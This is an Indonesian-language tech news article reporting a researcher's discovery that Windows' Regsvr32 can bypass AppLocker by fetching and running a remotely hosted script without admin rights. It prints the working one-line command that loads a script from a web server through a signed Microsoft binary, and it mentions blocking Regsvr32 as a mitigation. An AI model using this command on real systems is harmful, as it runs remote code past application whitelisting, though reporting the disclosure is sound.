Seorang peneliti dari Colorado yang bernama Casey Smith, telah menemukan bahwa Regsvr32 dapat digunakan untuk mem-bypass AppLocker pada Windows 10, dan ini merupakan masalah besar bagi pengguna komputer, terutama yang berada di lingkungan bisnis.

AppLocker pertama kali diperkenalkan di Windows 7 dan Windows Server 2008 R2. Ini dirancang untuk memungkinkan administrator menentukan kelompok atau pengguna mana yang dapat memanfaatkan sebagian atau semua aplikasi berdasarkan identitas unik file. Jika Anda adalah orang yang cenderung menggunakan AppLocker, maka itu harus menjadi pengetahuan umum bahwa itu dapat digunakan untuk membuat aturan tertentu untuk memungkinkan aplikasi untuk menjalankan atau menghentikannya di jalur mereka.

Bagi mereka yang mungkin tidak sadar, Regvr32 dapat digunakan untuk mendaftar dan membatalkan pendaftaran DLL. Ini bukan alat sekali klik karena merupakan utilitas baris perintah, jadi hanya pengguna komputer tingkat lanjut yang harus memanfaatkan apa yang ditawarkannya.

Kami memahami bahwa dengan menggunakan teknik ini, itu tidak mengubah registri sistem komputer, yang membuat sulit bagi admin untuk mengetahui apakah ada perubahan yang telah dibuat.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

“Yang menakjubkan di sini adalah bahwa regsvr32 sudah sadar proxy, menggunakan TLS, mengikuti pengalihan, dll … Dan … Anda menebak biner MS default yang ditandatangani. Jadi, yang perlu Anda lakukan adalah meng-host file Anda.

Teknik di atas tidak memerlukan hak administratif dan tidak mengubah registri. Selanjutnya, skrip dapat dipanggil melalui HTTP atau HTTPS. Saat ini, Microsoft belum merilis tambalan untuk masalah kecil ini, jadi satu-satunya pilihan pada saat ini adalah memblokir Regsvr32 melalui Windows Firewall.

Yang cukup menarik, raksasa perangkat lunak tersebut belum menanggapi masalah keamanan yang dihadapi sistem operasinya ini. Sekarang setelah di tempat terbuka, kami berharap untuk mendengar sesuatu dari perusahaan bersama dengan pembicaraan patch masa depan.